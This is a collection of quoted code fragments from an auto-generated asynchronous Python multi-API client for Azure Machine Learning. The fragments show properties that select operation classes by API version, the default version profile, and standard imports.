self._get_api_version('run_artifacts') if api_version == 'v1.0':", "def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview:", "the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete')", "api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass", "operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview:", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version", "self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: *", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01':", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return", "@property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\"", "{} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "* 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "= self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif", "* 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version", "from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import", "ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the", "* 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "= self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "\"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as", "CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations", "azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: *", "version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from", "Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>`", "workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>`", "'2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version))", "from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API", "@property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` *", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: * v1.0:", "does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version", "version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version =", "elif api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version ==", "from ..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory import", "'2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0:", "2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API", "{} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "\"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as", "ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version: *", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version ==", "1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "== '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None,", "self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise", ":class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version))", "may cause incorrect behavior and will be lost if the code is #", "not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self):", "api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API", "self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version", "{} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',", "version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version))", "* 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from", "models return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models", "raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config,", "import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as", "api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version:", "def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview:", "default, it uses the latest API version available on public Azure. For production,", "* 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview:", "\"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\"", "DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API", "ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import", "API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0':", "group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on", "not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0:", "Default waiting time between two polls for LRO operations if no Retry-After header", "A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval:", "not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self):", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: *", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return", "'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\",", "self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise", "\"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version ==", "* 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers')", "* 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version ==", "'2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def", "group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on", "{} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>`", "depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01:", "= self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version =", "have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client,", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version", "from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise", "import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from", "operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends", "* 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "* 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version:", "under the MIT License. See License.txt in the project root for # license", "== '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {}", "version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version", "2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "operation group is not described in the profile. :param credential: Credential needed for", "{ None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0',", "import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as", "Learning Workspace resources. This ready contains multiple API versions, to help you deal", "{} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from", "api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {}", "version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "RunOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version))", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return", "on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version =", "else: raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client,", "* 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config,", "the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version ==", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version:", "2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0':", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API", "depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if", "Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>`", "== 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {}", "on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version", "from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "== 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {}", "'2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from ..v2022_05_01", "elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version", "import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as", "..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations", "is provided, or if missing in profile. :type api_version: str :param base_url: Service", "'1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API", "else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client,", "'1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01',", "not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self):", "'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2':", "'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the", "Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>`", "api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass", "@property def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` 